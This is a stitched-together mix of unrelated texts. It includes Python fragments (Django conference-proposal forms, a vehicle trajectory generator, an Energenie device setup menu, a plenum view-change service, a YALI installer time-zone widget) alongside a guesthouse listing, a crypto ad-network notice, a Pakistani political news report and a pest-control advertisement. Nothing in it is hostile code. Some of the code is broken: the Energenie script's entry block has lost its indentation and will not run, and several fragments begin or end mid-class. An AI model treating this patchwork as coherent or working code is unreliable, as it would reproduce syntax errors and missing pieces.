        self.fields["proposal_type"].choices = _get_proposal_type_choices(
            conference, action=action
        )

    @classmethod
    def populate_form_for_update(self, proposal):
        """Build a ProposalForm pre-filled from an existing *proposal*.

        NOTE(review): the first parameter receives the class (it is a
        classmethod); it is conventionally named ``cls`` but kept as-is.
        """
        form = ProposalForm(
            proposal.conference,
            initial={
                "title": proposal.title,
                "description": proposal.description,
                "target_audience": proposal.target_audience,
                "prerequisites": proposal.prerequisites,
                "video_url": proposal.video_url,
                "content_urls": proposal.content_urls,
                "private_content_urls": proposal.private_content_urls,
                "speaker_info": proposal.speaker_info,
                "speaker_links": proposal.speaker_links,
                "is_first_time_speaker": proposal.is_first_time_speaker,
                "status": proposal.status,
                "proposal_section": proposal.proposal_section.pk,
                "proposal_type": proposal.proposal_type.pk,
            },
        )
        return form
class ProposalCommentForm(forms.Form):
    """
    Used to add comments
    """

    # Markdown comment body with live preview.
    comment = forms.CharField(widget=PagedownWidget(show_preview=True))
    # Hidden flags -- presumably set by the rendering view to mark private
    # and reviewer-only comments; confirm against the comment views.
    private = forms.BooleanField(required=False, widget=forms.HiddenInput())
    reviewer = forms.BooleanField(required=False, widget=forms.HiddenInput())
class ProposalReviewForm(forms.Form):
    """
    Used to review the proposal.
    """

    # One radio button per available review status.
    review_status = forms.ChoiceField(
        choices=ProposalReviewStatus.CHOICES, widget=forms.RadioSelect()
    )
class ProposalReviewerVoteForm(forms.Form):
    """
    Used by ProposalSectionReviewers to vote on proposals.
    """

    # Vote choices are conference-dependent and assigned in __init__.
    vote_value = forms.ChoiceField(
        widget=forms.RadioSelect(),
        label="Do you think this proposal will make a good addition to PyCon India ?",
    )
    comment = forms.CharField(
        widget=forms.Textarea(attrs={"minlength": "30"}),
        help_text="Leave a comment justifying your vote.",
    )

    def __init__(self, *args, **kwargs):
        """Accept an optional ``conference`` kwarg and derive vote choices."""
        conference = kwargs.pop("conference", None)
        super(ProposalReviewerVoteForm, self).__init__(*args, **kwargs)
        self.fields["vote_value"].choices = (
            _get_proposal_section_reviewer_vote_choices(conference)
        )
class ProposalTypesChoices(forms.Form):
    """
    Base proposal form with proposal sections & types.
    """

    # Choices for both fields are populated per-conference in __init__.
    proposal_section = forms.ChoiceField(
        widget=forms.Select(attrs={"class": "dropdown"})
    )
    proposal_type = forms.ChoiceField(widget=forms.Select(attrs={"class": "dropdown"}))

    def __init__(self, conference, *args, **kwargs):
        """Fill section/type choices from *conference*."""
        super(ProposalTypesChoices, self).__init__(*args, **kwargs)
        self.fields["proposal_section"].choices = _get_proposal_section_choices(
            conference
        )
        self.fields["proposal_type"].choices = _get_proposal_type_choices(conference)
class ProposalsToReviewForm(ProposalTypesChoices):
    """
    Used to filter proposals
    """

    reviewer_comment = forms.ChoiceField(
        widget=forms.Select(attrs={"class": "dropdown"})
    )

    def __init__(self, conference, proposal_sections, *args, **kwargs):
        """Restrict section choices to *proposal_sections* and add filters."""
        super(ProposalsToReviewForm, self).__init__(conference, *args, **kwargs)
        self.fields["reviewer_comment"].choices = ProposalReviewerComment.CHOICES
        self.fields["proposal_section"].choices = [
            (str(section.id), section.name) for section in proposal_sections
        ]
        # Every filter dropdown gets a catch-all "All" as its first entry.
        for field in list(self.fields.values()):
            field.choices.insert(0, ("all", "All"))
class ProposalVotesFilterForm(ProposalTypesChoices):
    """
    Form to filter proposals based on votes and review_status.
    """

    votes = forms.ChoiceField(widget=forms.Select(attrs={"class": "dropdown votes"}))
    review_status = forms.ChoiceField(widget=forms.Select(attrs={"class": "dropdown"}))

    def __init__(self, conference, *args, **kwargs):
        super(ProposalVotesFilterForm, self).__init__(conference, *args, **kwargs)
        self.fields["votes"].choices = ProposalVotesFilter.CHOICES
        self.fields["review_status"].choices = ProposalReviewStatus.CHOICES
        # Mutates each field's choices list in place; "all" becomes the
        # first (default) option of every dropdown.
        for name, field in list(self.fields.items()):
            field.choices.insert(0, ("all", "All"))
|
Casa Ríos offers accommodations in Biescas. Guests can enjoy city views. All rooms in the guesthouse are equipped with a flat-screen TV and a private bathroom with free toiletries. Guests at Casa Ríos will be able to enjoy activities in and around Biescas, such as skiing and cycling. Formigal is 15 miles from the accommodation.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division
import sys
import argparse
import numpy as np
np.set_printoptions(precision=3, suppress=True)
from numpy import cos, sin
# fix imports
sys.path.append('../src')
from vehicle_core.path import trajectory_tools as tt
# constants

# Trajectory geometries selectable on the command line: each entry names
# the vehicle DOF(s) the generated waypoints will exercise.
T_TYPES = [
    'surge',
    'sway',
    'heave',
    'yaw',
    'surge+heave',
    'sway+heave',
    'yaw+heave'
]
def main():
    """Parse command-line arguments and emit a zig-zag test trajectory.

    The trajectory starts at the requested (n, e, d, yaw) pose and bounces
    C times between a displaced pose and the start pose along the DOFs
    selected by <type>; it is then rotated into the initial yaw frame and
    exported (YAML if available, JSON otherwise).
    """
    parser = argparse.ArgumentParser(description="Utility for generating navigation trajectories used by navigator module.",
                                     epilog="This is part of vehicle_pilot module.")

    parser.add_argument('type', choices=T_TYPES, metavar='type', help='Specify the DOFs used by the trajectory.')
    parser.add_argument('n', type=float, help='Initial NORTH coordinate.')
    parser.add_argument('e', type=float, help='Initial EAST coordinate.')
    parser.add_argument('d', type=float, help='Initial DEPTH coordinate.')
    parser.add_argument('y', type=float, help='Initial YAW coordinate.')
    parser.add_argument('delta_dof', type=float, metavar='delta_dof', help='Maximum displacement in <type> trajectory.')
    parser.add_argument('--output', default='json', help='Output trajectory format.')
    parser.add_argument('-v', '--verbose', action='store_true', help='Print detailed information.')

    args = parser.parse_args()

    # displacement must stay inside the supported envelope (1 to 15)
    if args.delta_dof < 1 or args.delta_dof > 15:
        print('Could not generate trajectory with {} maximum displacement.\n'.format(args.delta_dof))
        sys.exit(1)

    # initial depth must stay inside the supported envelope (0 to 3)
    # BUGFIX: this branch previously printed the displacement error message
    if args.d < 0 or args.d > 3:
        print('Could not generate trajectory with {} initial depth (0, 3).\n'.format(args.d))
        sys.exit(1)

    # yaw is expected in radians within (-pi, pi)
    if args.y > np.pi or args.y < -np.pi:
        print('Could not generate trajectory with {} yaw angle (-pi, pi).\n'.format(args.y))
        sys.exit(1)

    # waypoints matrix: C "out-and-back" cycles plus the initial waypoint
    C = 10
    N = 2 * C + 1

    # initial position replicated over all N waypoints
    # (a dead np.zeros allocation that was immediately overwritten has been removed)
    INIT = np.array([args.n, args.e, args.d, 0, 0, args.y])
    WPS = np.tile(INIT, (N, 1))

    # per-DOF displacements
    dw = [args.delta_dof]

    # select geometry: which DOF columns to displace and by how much
    # (heave is clamped to 3 to respect the depth envelope)
    if args.type == 'surge':
        dof = [0]
    elif args.type == 'sway':
        dof = [1]
    elif args.type == 'heave':
        dof = [2]
        dw = [min(args.delta_dof, 3)]
    elif args.type == 'yaw':
        dof = [5]
    elif args.type == 'surge+heave':
        dof = [0,2]
        dw = [args.delta_dof, min(args.delta_dof, 3)]
    elif args.type == 'sway+heave':
        dof = [1,2]
        dw = [args.delta_dof, min(args.delta_dof, 3)]
    elif args.type == 'yaw+heave':
        dof = [5,2]
        dw = [args.delta_dof, min(args.delta_dof, 3)]
    else:
        print('Could not generate {} trajectory geometry.\n'.format(args.type))
        sys.exit(1)

    # trajectory generation: odd rows ramp from the maximum displacement
    # down towards the start, even rows return to the start position
    for i,d in enumerate(dof):
        w_max = WPS[0, d] + dw[i]
        w_min = WPS[0, d] + np.ceil(dw[i] / N)

        WPS[1::2, d] = np.linspace(w_max, w_min, num=C)
        WPS[2::2, d] = WPS[0, d] * np.ones((C,))

    # compensate for initial yaw
    ROT = np.eye(6)         # rotation matrix
    r = 0                   # roll
    p = 0                   # pitch
    y = WPS[0,5]            # yaw

    # set the rotation using current attitude (roll and pitch are zero,
    # so this is effectively a yaw-only rotation of the N/E columns)
    ROT[0:2, 0:2] = [
        [cos(p)*cos(y), cos(r)*sin(y)+sin(r)*sin(p)*cos(y)],
        [-cos(p)*sin(y), cos(r)*cos(y)-sin(r)*sin(p)*sin(y)]
    ]

    # apply rotation
    WPR = np.dot(WPS, ROT)

    # trajectory export metadata
    spec = {
        'type': args.type,
        'delta': dw,
        'dof': dof
    }

    if args.verbose:
        print(WPS)
        print(' ')
        print(WPR)
        print(' ')
        tt.plot_trajectory(WPR, arrow_length=0.2)

    # print final trajectory (prefer YAML, fall back to JSON)
    try:
        import yaml
        print(yaml.dump(tt.traj_as_dict(WPR, **spec)))
    except ImportError:
        import json
        print(json.dumps(tt.traj_as_dict(WPR, **spec)))
# script entry point
if __name__ == '__main__':
    main()
|
We use the wimplo.com domain name for all communication with potential and active clients. Our staff use official company domain @wimplo.com email addresses.
Anyone writing from an address with a different domain name is likely an impostor.
With your banners on top crypto-related websites, you will get all the relevant traffic and brand awareness.
|
# setup_tool.py 28/05/2016 D.J.Whale
#
# A simple menu-driven setup tool for the Energenie Python library.
#
# Just be a simple menu system.
# This then means you don't have to have all this in the demo apps
# and the demo apps can just refer to object variables names
# from an assumed auto_create registry, that is built using this setup tool.
import time
import energenie
##from energenie.lifecycle import *
#===== GLOBALS =====

# Set True by do_quit() to make the menu loops fall through and exit.
quit = False

#===== INPUT METHODS ==========================================================

# Portable line-input shim: raw_input only exists on Python 2.
try:
    readin = raw_input # Python 2
except NameError:
    readin = input # Python 3
def get_house_code():
    """Prompt for a hex house code; None selects the Energenie default."""
    while True:
        try:
            entry = readin("House code (ENTER for default)? ")
            if entry == "": return None
        except KeyboardInterrupt:
            return None # user abort
        try:
            return int(entry, 16)
        except ValueError:
            print("Must enter a number")
def get_device_index():
    """Prompt for a switch index 1..4; ENTER selects all (returns 0)."""
    while True:
        try:
            entry = readin("Device index 1..4 (ENTER for all)? ")
        except KeyboardInterrupt:
            return None # user abort
        if entry == "":
            return 0 # 0 means ALL devices
        try:
            return int(entry)
        except ValueError:
            print("Must enter a number")
def show_registry():
    """Print the registry as a numbered list and return the device names."""
    names = []
    for index, name in enumerate(energenie.registry.names(), start=1):
        print("%d. %s %s" % (index, name, energenie.registry.get(name)))
        names.append(name)
    return names
def get_device_name():
    """Let the user pick a registry device by number; None on abort."""
    names = show_registry()
    try:
        while True:
            entry = readin("Which device %s to %s? " % (1, len(names)))
            try:
                selected = int(entry)
            except ValueError:
                print("Must enter a number")
                continue
            if 1 <= selected <= len(names):
                break # got it
            print("Choose a number between %s and %s" % (1, len(names)))
    except KeyboardInterrupt:
        return None # nothing chosen, user aborted
    name = names[selected-1]
    print("selected: %s" % name)
    return name
#===== ACTION ROUTINES ========================================================
def do_legacy_learn():
    """Repeatedly broadcast a legacy switch message, so you can learn a socket to the pattern"""
    house_code = get_house_code()
    device_index = get_device_index()

    # A MiHomeLight is used because it has the longest TX time
    device = energenie.Devices.MIHO008((house_code, device_index))

    print("Legacy learn broadcasting, Ctrl-C to stop")
    try:
        while True:
            # alternate ON/OFF so the socket can latch onto the pattern
            for label, action in (("ON", device.turn_on), ("OFF", device.turn_off)):
                print(label)
                action()
                time.sleep(0.5)
    except KeyboardInterrupt:
        pass # user exit
def do_mihome_discovery():
    """Discover any mihome device when it sends reports"""
    print("Discovery mode, press Ctrl-C to stop")
    # ask-mode discovery: the user confirms each newly seen device
    energenie.discovery_ask(energenie.ask)
    try:
        while True:
            energenie.loop() # Allow receive processing
            time.sleep(0.25) # tick fast enough to get messages in quite quickly
    except KeyboardInterrupt:
        print("Discovery stopped")
def do_list_registry():
    """List the entries in the registry"""
    print("REGISTRY:")
    show_registry()
    # also show the FSK routing table behind the registry
    energenie.registry.fsk_router.list()
def do_switch_device():
    """Turn the switch on a socket on and off, to test it.

    Presents a small on/off sub-menu for the chosen device until the
    user aborts with Ctrl-C (or quits).
    """
    global quit
    name = get_device_name()
    # BUGFIX: get_device_name() returns None on user abort; previously this
    # fell through to registry.get(None) (siblings already guard for this).
    if name is None: return # user abort
    device = energenie.registry.get(name)

    def on():
        print("Turning on")
        device.turn_on()

    def off():
        print("Turning off")
        device.turn_off()

    MENU = [
        ("on", on),
        ("off", off)
    ]

    try:
        while not quit:
            show_menu(MENU)
            choice = get_choice((1,len(MENU)))
            if choice != None:
                handle_choice(MENU, choice)
    except KeyboardInterrupt:
        pass # user exit
    # do_quit() only exits this sub-menu, not the whole tool
    quit = False
def do_show_device_status():
    """Show the readings associated with a device"""
    name = get_device_name()
    # BUGFIX: get_device_name() returns None on user abort; previously this
    # fell through to registry.get(None) (siblings already guard for this).
    if name is None: return # user abort
    device = energenie.registry.get(name)
    readings = device.get_readings_summary()
    print(readings)
def do_watch_devices():
    """Poll and print a readings summary for every device, once a second."""
    print("Watching devices, Ctrl-C to stop")
    try:
        while True:
            energenie.loop() # allow receive processing

            print('-' * 80)
            for device_name in energenie.registry.names():
                summary = energenie.registry.get(device_name).get_readings_summary()
                print("%s %s" % (device_name, summary))
            print("")
            time.sleep(1)
    except KeyboardInterrupt:
        pass # user exit
def do_rename_device():
    """Rename a device in the registry to a different name.

    Useful when turning auto-discovered names into your own names.
    """
    old_name = get_device_name()
    if old_name is None: return # user abort (idiom fix: was '== None')
    try:
        new_name = readin("New name? ")
    except KeyboardInterrupt:
        return # user abort
    # ROBUSTNESS: refuse an empty name rather than creating a nameless entry
    if new_name == "":
        print("Name unchanged")
        return
    energenie.registry.rename(old_name, new_name)
    print("Renamed OK")
def do_delete_device():
    """Delete a device from the registry so it is no longer recognised"""
    name = get_device_name()
    if name is None: return # user abort (idiom fix: was '== None')
    energenie.registry.delete(name)
    print("Deleted OK")
def do_logging():
    """Enter a mode where all communications are logged to screen and a file"""
    import Logger

    # provide a default incoming message handler for all fsk messages
    def incoming(address, message):
        print("\nIncoming from %s" % str(address))
        print(message)
        Logger.logMessage(message)

    energenie.fsk_router.when_incoming(incoming)

    print("Logging enabled, Ctrl-C to stop")
    try:
        while True:
            energenie.loop()
    except KeyboardInterrupt:
        pass #user quit
    finally:
        # always detach the handler so later modes are unaffected
        energenie.fsk_router.when_incoming(None)
def do_quit():
    """Signal the menu loops (main and sub-menus) to exit."""
    global quit
    quit = True
#===== MENU ===================================================================
def show_menu(menu):
    """Print the (label, handler) menu entries as a numbered list."""
    for number, entry in enumerate(menu, start=1):
        print("%d. %s" % (number, entry[0]))
def get_choice(choices):
    """Read a menu choice, re-prompting until it lies in choices=(first, last)."""
    first, last = choices
    try:
        while True:
            entry = readin("Choose %d to %d? " % (first, last))
            try:
                value = int(entry)
            except ValueError:
                print("Must enter a number")
                continue
            if first <= value <= last:
                return value
            print("Must enter a number between %d and %d" % (first, last))
    except KeyboardInterrupt:
        # Ctrl-C means quit; caller loops check the quit flag
        do_quit()
def handle_choice(menu, choice):
    """Invoke the handler stored in the 1-based menu entry for choice."""
    label, handler = menu[choice-1]
    handler()
# (label, handler) pairs presented by setup_tool()
MAIN_MENU = [
    ("legacy learn mode",      do_legacy_learn),
    ("mihome discovery mode",  do_mihome_discovery),
    ("list registry",          do_list_registry),
    ("switch device",          do_switch_device),
    ("show device status",     do_show_device_status),
    ("watch devices",          do_watch_devices),
    ("rename device",          do_rename_device),
    ("delete device",          do_delete_device),
    ("logging",                do_logging),
    ("quit",                   do_quit)
]
#===== MAIN PROGRAM ===========================================================
def setup_tool():
    """The main program loop"""
    while not quit:
        print("\nMAIN MENU")
        show_menu(MAIN_MENU)
        choice = get_choice((1,len(MAIN_MENU)))
        # get_choice() may have set the quit flag on Ctrl-C, in which
        # case choice is None and must not be dispatched
        if not quit:
            print("\n")
            handle_choice(MAIN_MENU, choice)
if __name__ == "__main__":
energenie.init()
try:
setup_tool()
finally:
energenie.finished()
# END
|
BADIN: Pakistan People’s Party (PPP) leaders have warned the federal and Punjab governments to mend their ways and provide Sindh with its due share of water resources.
PPP leaders Gul Mohammad Jakhrani, Syed Ali Bux aka Pappu Shah, Bibi Yasmin Shah, member of National Assembly (MNA) Sardar Kamal Khan, member of provincial assembly (MPA) Mir Allah Bux Talpur, Haji Sain Bux Jamali, Haji Ramazan Chandio and others addressed a large public gathering at Mir Ghulam Mohammad Higher Secondary School’s ground in Tando Bago town on Sunday.
They alleged that the federal government, in connivance with Punjab, was involved in stealing the water share of Sindh as people in the province were facing the worst water crisis. They said that both the prime minister and the Punjab chief minister were responsible for the water crisis and other issues in the province.
The PPP leaders said that they would block the roads leading to Punjab at Hatri Bypass in Hyderabad on May 16 and then they would proceed to Islamabad to stage a demonstration outside the parliament house and the Supreme Court of Pakistan to register their protest against the federal government.
They further said that they were united and would inflict a heavy defeat on the estranged PPP leader Dr Zulfikar Ali Mirza and other opponents in Badin and other parts of the province. They asked Dr Mirza to stop using foul and filthy language against party leaders.
They assured the participants of the public gathering that nobody would be allowed to steal the water share of the province, while adding that they were trying to provide water to all areas of the province.
|
from typing import Callable
from plenum.common.config_util import getConfig
from plenum.common.constants import NODE_STATUS_DB_LABEL, VIEW_CHANGE_PREFIX
from plenum.common.event_bus import InternalBus, ExternalBus
from plenum.common.messages.internal_messages import VoteForViewChange, NodeNeedViewChange, NewViewAccepted
from plenum.common.messages.node_messages import InstanceChange
from plenum.common.metrics_collector import MetricsCollector, NullMetricsCollector
from plenum.common.router import Subscription
from plenum.common.stashing_router import StashingRouter, DISCARD
from plenum.common.timer import TimerService
from plenum.server.consensus.consensus_shared_data import ConsensusSharedData
from plenum.server.consensus.utils import replica_name_to_node_name
from plenum.server.database_manager import DatabaseManager
from plenum.server.replica_validator_enums import STASH_CATCH_UP, CATCHING_UP
from plenum.server.suspicion_codes import Suspicions, Suspicion
from plenum.server.view_change.instance_change_provider import InstanceChangeProvider
from stp_core.common.log import getlogger
logger = getlogger()
class ViewChangeTriggerService:
    """Votes for and triggers view changes.

    Broadcasts this node's own InstanceChange votes, validates and tallies
    InstanceChange messages received from other nodes, and emits
    NodeNeedViewChange on the internal bus once a quorum of votes for a
    view higher than the current one has been collected.
    """

    def __init__(self,
                 data: ConsensusSharedData,
                 timer: TimerService,
                 bus: InternalBus,
                 network: ExternalBus,
                 db_manager: DatabaseManager,
                 stasher: StashingRouter,
                 is_master_degraded: Callable[[], bool],
                 metrics: MetricsCollector = NullMetricsCollector()):
        self._data = data
        self._timer = timer
        self._bus = bus
        self._network = network
        self._stasher = stasher
        self._is_master_degraded = is_master_degraded
        self.metrics = metrics

        self._config = getConfig()

        # Persistent, time-pruned store of InstanceChange votes per view
        self._instance_changes = \
            InstanceChangeProvider(outdated_ic_interval=self._config.OUTDATED_INSTANCE_CHANGES_CHECK_INTERVAL,
                                   node_status_db=db_manager.get_store(NODE_STATUS_DB_LABEL),
                                   time_provider=timer.get_current_time)

        self._subscription = Subscription()
        self._subscription.subscribe(bus, VoteForViewChange, self.process_vote_for_view_change)
        self._subscription.subscribe(bus, NewViewAccepted, self.process_new_view_accepted)
        self._subscription.subscribe(stasher, InstanceChange, self.process_instance_change)

    def cleanup(self):
        """Detach all bus/stasher subscriptions."""
        self._subscription.unsubscribe_all()

    @property
    def name(self):
        # node-level name (replica suffix stripped)
        return replica_name_to_node_name(self._data.name)

    def __repr__(self):
        return self.name

    def process_vote_for_view_change(self, msg: VoteForViewChange):
        """Turn an internal vote into an InstanceChange broadcast."""
        proposed_view_no = self._data.view_no
        # TODO: Some time ago it was proposed that view_no should not be increased during proposal
        # if view change is already in progress, unless suspicion code is "view change is taking too long".
        # Idea was to improve stability of view change triggering, however for some reason this change lead
        # to lots of failing/flaky tests. This still needs to be investigated.
        # if suspicion == Suspicions.INSTANCE_CHANGE_TIMEOUT or not self.view_change_in_progress:
        if msg.suspicion != Suspicions.STATE_SIGS_ARE_NOT_UPDATED or not self._data.waiting_for_new_view:
            proposed_view_no += 1
        # an explicit view number in the vote overrides the computed one
        if msg.view_no is not None:
            proposed_view_no = msg.view_no
        self._send_instance_change(proposed_view_no, msg.suspicion)

    def process_instance_change(self, msg: InstanceChange, frm: str):
        """Validate, record and possibly act on another node's InstanceChange.

        Returns a (DISCARD/STASH, reason) tuple for the stashing router on
        rejection, None when the message was consumed.
        """
        frm = replica_name_to_node_name(frm)

        # TODO: Do we really need this?
        if frm not in self._network.connecteds:
            return DISCARD, "instance change request: {} from {} which is not in connected list: {}".\
                format(msg, frm, self._network.connecteds)

        if not self._data.is_participating:
            return STASH_CATCH_UP, CATCHING_UP

        logger.info("{} received instance change request: {} from {}".format(self, msg, frm))

        if msg.viewNo <= self._data.view_no:
            return DISCARD, "instance change request with view no {} which is not more than its view no {}".\
                format(msg.viewNo, self._data.view_no)

        # Record instance changes for views but send instance change
        # only when found master to be degraded. if quorum of view changes
        # found then change view even if master not degraded
        self._on_verified_instance_change_msg(msg, frm)

        if self._instance_changes.has_inst_chng_from(msg.viewNo, self.name):
            logger.info("{} received instance change message {} "
                        "but has already sent an instance change message".format(self, msg))
        elif not self._is_master_degraded():
            logger.info("{} received instance change message {} "
                        "but did not find the master to be slow".format(self, msg))
        else:
            logger.display("{}{} found master degraded after "
                           "receiving instance change message from {}".format(VIEW_CHANGE_PREFIX, self, frm))
            self._send_instance_change(msg.viewNo, Suspicions.PRIMARY_DEGRADED)

    def process_new_view_accepted(self, msg: NewViewAccepted):
        """A view change completed; votes for the old view are now obsolete."""
        self._instance_changes.remove_view(self._data.view_no)

    def _send_instance_change(self, view_no: int, suspicion: Suspicion):
        """Broadcast an InstanceChange vote and tally it for this node."""
        logger.info("{}{} sending an instance change with view_no {} since {}".
                    format(VIEW_CHANGE_PREFIX, self, view_no, suspicion.reason))
        msg = InstanceChange(view_no, suspicion.code)
        self._network.send(msg)
        # record instance change vote for self and try to change the view if quorum is reached
        self._on_verified_instance_change_msg(msg, self.name)

    def _on_verified_instance_change_msg(self, msg: InstanceChange, frm: str):
        """Tally one vote (deduplicated per view/sender); maybe start a view change."""
        view_no = msg.viewNo
        if not self._instance_changes.has_inst_chng_from(view_no, frm):
            self._instance_changes.add_vote(msg, frm)
            if view_no > self._data.view_no:
                self._try_start_view_change_by_instance_change(view_no)

    def _try_start_view_change_by_instance_change(self, proposed_view_no: int) -> bool:
        """Emit NodeNeedViewChange if a quorum for proposed_view_no exists."""
        # TODO: Need to handle skewed distributions which can arise due to
        # malicious nodes sending messages early on
        can, why_not = self._can_view_change(proposed_view_no)
        if can:
            logger.display("{}{} initiating a view change to {} from {}".
                           format(VIEW_CHANGE_PREFIX, self, proposed_view_no, self._data.view_no))
            self._bus.send(NodeNeedViewChange(view_no=proposed_view_no))
        else:
            logger.info(why_not)
        return can

    def _can_view_change(self, proposed_view_no: int) -> (bool, str):
        """Return (allowed, reason-if-not) for starting a view change."""
        quorum = self._data.quorums.view_change.value

        if not self._instance_changes.has_quorum(proposed_view_no, quorum):
            return False, '{} has no quorum for view {}'.format(self, proposed_view_no)

        if not proposed_view_no > self._data.view_no:
            return False, '{} is in higher view more than {}'.format(self, proposed_view_no)

        return True, ''
|
Spring season brings beautiful flowers and growth with it, but unfortunately it also bring the warm and wet environment which kick pests into their hyperactive and breeding modes. Getting ready for spring and summer is easy with an early spring pest treatment designed to stop pests before they begin breeding and entering your home, preventing infestations and expensive exterminations later in the year.
In Las Vegas, Nevada, pests can ruin our homes and pose a health threat. That’s why at Ace Pest Control, we seek to offer year round pest control through our spring pest treatments. We use our best pest identification and protection programs to ensure that your home’s structure is up to the task of keeping bugs out during the spring, and when it becomes cold and bugs look for warmth in the winter as well.
During spring season many insects will begin looking for a place to nest as well as for a food source, our pest control treatments during this season are focused on perimeter treatment to prevent against ants, wasps, hornets, spiders, centipedes, crickets, flies, earwigs, beetles, and many other pests. However, we also offer a year round treatment program in which we can visit your home throughout the year and apply pest deterring solutions to the key pest entry points of your home.
At Ace Pest Control, our goal is always to stop pests and pest problems on the outside before they become inside pests and inside problems. This approach reduces the need for inside treatments as well as the inconvenience and expense associated with removing an infestation after it has begun in a home.
If you’re looking for a local pest control company in Las Vegas that offers affordable pest removal and preventative services, then give us a call today at (702) 871-1211. We specialize in removing and preventing bed bugs, cockroaches, spiders, ants, wasps, bees, yellow jackets, mice, and many other pests and rodents.
Through the years of experience that we have accumulated in pest control, we have also gathered many references for both removal jobs and yearly pest control service contracts. Our dedication to perfection and preventive care has earned us the “pest control guys” title in the Las Vegas area, which we are extremely proud to have earned and continue to hold even today. At Ace Pest Control, we respect our clients and their needs, and because of that we take extra care in maximizing comfort and pest control effectiveness.
At Ace Pest Control, our staff’s focus is dedicated to making sure that you are 100% satisfied and safe. This means that your comfort and safety always takes precedence over anything else, and when you work with us it’s hard to miss how much we value our customers.
One of the most valuable services we provide for homeowners — one that can save them hundreds of thousands of dollars in damages that would otherwise go unchecked — is our routine inspections during any service we offer. This ensures that you never find yourself with a surprise infestation of anything ranging from ants to mice, not only protecting your safety but also saving you time and money in the long run on expensive exterminations.
If you see something that isn’t right or makes you question if your home may have a pest problem, don’t hesitate to call us. We extend our full inspection for free to all homeowners that are worried about their home and family, regardless of any other service we offer. To make use of our free pest inspection and consultation, give us a call at (702) 871-1211.
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2008-2010 TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
import gettext
_ = gettext.translation('yali', fallback=True).ugettext
from PyQt4.Qt import QWidget, SIGNAL, QTimer, QDate, QComboBox, QTime
from pds.thread import PThread
from pds.gui import PMessageBox, MIDCENTER, CURRENT, OUT
import yali.localedata
import yali.context as ctx
import yali.postinstall
import yali.storage
from yali.gui import ScreenWidget
from yali.gui.Ui.datetimewidget import Ui_DateTimeWidget
from yali.timezone import TimeZoneList
class Widget(QWidget, ScreenWidget):
    """Installer screen for choosing a time zone and setting date/time.

    Builds continent/country combo boxes from the system time zone list,
    shows a live-updating clock, and (for STEP_BASE installs) kicks off
    storage initialisation in the background when leaving the screen.
    NOTE(review): Python 2 / PyQt4 era code (``has_key``, old-style signals).
    """
    name = "timeSetup"

    def __init__(self):
        QWidget.__init__(self)
        self.ui = Ui_DateTimeWidget()
        self.ui.setupUi(self)

        self.timer = QTimer(self)
        # True while updateClock() itself writes the time edit, so that
        # timerStop() can tell programmatic updates from user edits
        self.from_time_updater = True
        self.is_date_changed = False

        # filled by createTZDictionary(); assumes the configured timezone
        # is present in the system zone list -- TODO confirm
        self.current_zone = ""
        self.tz_dict = {}
        self.continents = []
        self.countries = []

        # pick the default timezone from the install language's locale data
        for country, data in yali.localedata.locales.items():
            if country == ctx.consts.lang:
                if data.has_key("timezone"):
                    ctx.installData.timezone = data["timezone"]

        # Append continents and countries the time zone dictionary
        self.createTZDictionary()

        # Sort continent list
        self.sortContinents()

        # Append sorted continents to combobox
        self.loadContinents()

        # Load current continents country list
        self.getCountries(self.current_zone["continent"])

        # Highlight the current zone
        self.index = self.ui.continentList.findText(self.current_zone["continent"])
        self.ui.continentList.setCurrentIndex(self.index)

        self.index = self.ui.countryList.findText(self.current_zone["country"])
        self.ui.countryList.setCurrentIndex(self.index)

        # Initialize widget signal and slots
        self.__initSignals__()

        self.ui.calendarWidget.setDate(QDate.currentDate())

        self.pthread = None
        self.pds_messagebox = PMessageBox(self)
        self.pds_messagebox.enableOverlay()

        self.timer.start(1000)

    def __initSignals__(self):
        """Wire UI signals to their slots."""
        self.connect(self.ui.timeEdit, SIGNAL("timeChanged(QTime)"), self.timerStop)
        self.connect(self.ui.calendarWidget, SIGNAL("selectionChanged()"), self.dateChanged)
        self.connect(self.timer, SIGNAL("timeout()"), self.updateClock)
        self.connect(self.ui.continentList, SIGNAL("activated(QString)"), self.getCountries)

    def createTZDictionary(self):
        """Build {continent: [[country, zone], ...]} from the system zones
        and remember the entry matching the configured timezone."""
        tz = TimeZoneList()
        zones = [ x.timeZone for x in tz.getEntries() ]
        zones.sort()

        for zone in zones:
            split = zone.split("/")

            # Human readable continent names
            continent_pretty_name = split[0].replace("_", " ")
            continent_pretty_name = continent_pretty_name  # no-op assignment, kept as-is

            # Some country names can be like Argentina/Catamarca so this fixes the splitting problem
            # caused by zone.split("/")
            #
            # Remove continent info and take the rest as the country name
            split.pop(0)
            country_pretty_name = " / ".join(split)

            # Human readable country names
            country_pretty_name = country_pretty_name.replace("_", " ")

            # Get current zone
            if zone == ctx.installData.timezone:
                self.current_zone = { "continent":continent_pretty_name, "country":country_pretty_name}

            # Append to dictionary
            if self.tz_dict.has_key(continent_pretty_name):
                self.tz_dict[continent_pretty_name].append([country_pretty_name, zone])
            else:
                self.tz_dict[continent_pretty_name] = [[country_pretty_name, zone]]

    def sortContinents(self):
        """Collect the continent keys into a sorted list."""
        for continent in self.tz_dict.keys():
            self.continents.append(continent)
        self.continents.sort()

    def loadContinents(self):
        """Populate the continent combobox (in sorted order)."""
        for continent in self.continents:
            self.ui.continentList.addItem(continent)

    def getCountries(self, continent):
        """Reload the country combobox with the continent's entries;
        the zone string is stored as each item's user data."""
        # Countries of the selected continent
        countries = self.tz_dict[str(continent)]
        self.ui.countryList.clear()

        for country, zone in countries:
            self.ui.countryList.addItem(country, zone)
            self.countries.append(country)

    def dateChanged(self):
        """Remember that the user picked a date, so execute() applies it."""
        self.is_date_changed = True

    def timerStop(self):
        """Stop auto-updating the clock once the user edits the time."""
        if self.from_time_updater:
            # ignore the change triggered by updateClock() itself
            return

        # Human action detected; stop the timer.
        self.timer.stop()

    def updateClock(self):
        """Per-second tick: push the current time into the time edit."""

        # What time is it ?
        cur = QTime.currentTime()

        self.from_time_updater = True
        self.ui.timeEdit.setTime(cur)
        self.from_time_updater = False

    def shown(self):
        """Called when the screen becomes visible; restart the clock and
        prepare the background thread for storage initialisation."""
        self.timer.start(1000)
        if ctx.flags.install_type == ctx.STEP_BASE:
            self.pthread = PThread(self, self.startInit, self.dummy)

    def dummy(self):
        # no-op completion callback for PThread
        pass

